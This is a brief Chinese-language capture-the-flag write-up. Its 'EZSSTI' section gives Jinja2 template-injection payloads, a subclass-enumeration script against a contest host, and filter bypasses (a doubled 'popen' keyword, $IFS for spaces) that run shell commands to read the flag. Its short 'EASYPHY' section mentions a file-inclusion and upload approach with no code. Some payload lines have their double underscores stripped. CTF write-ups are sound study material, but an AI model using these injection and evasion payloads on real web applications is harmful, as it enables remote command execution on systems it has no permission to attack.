EZSSTI
?name={{''.__class__.__mro__[-1].__subclasses__()}}
查看所有子类
from requests import *
for i in range(300):
url="http://4dcc7f0f-0e07-49e1-b2c8-b9ce9de9c125.race-node.hscsec.cn:8080/?name={{[].__class__.__mro__[-1].__subclasses__()[%s]}}"%i
m=get(url)
print(f"{i}:{m.text}")
找到这个类
?name={{''.class.mro[-1].subclasses()[132].init.globals.popen('ls /').read()}}
发现报错,猜测是把popen替换成空,后面测试发现不能有空格
?name={{''.class.mro[-1].subclasses()[132].init.globals.poppopenen('ls /').read()}}
?name={{''.class.mro[-1].subclasses()[132].init.globals.ppopenopen('cat$IFS$9/flaflagg').read()}}
EASYPHY
发现这个页面,有点像是文件包含,再加上后面的文件上传后缀没办法绕过,基本就是了
system那一系列传不上去,
然后文件包含一下即可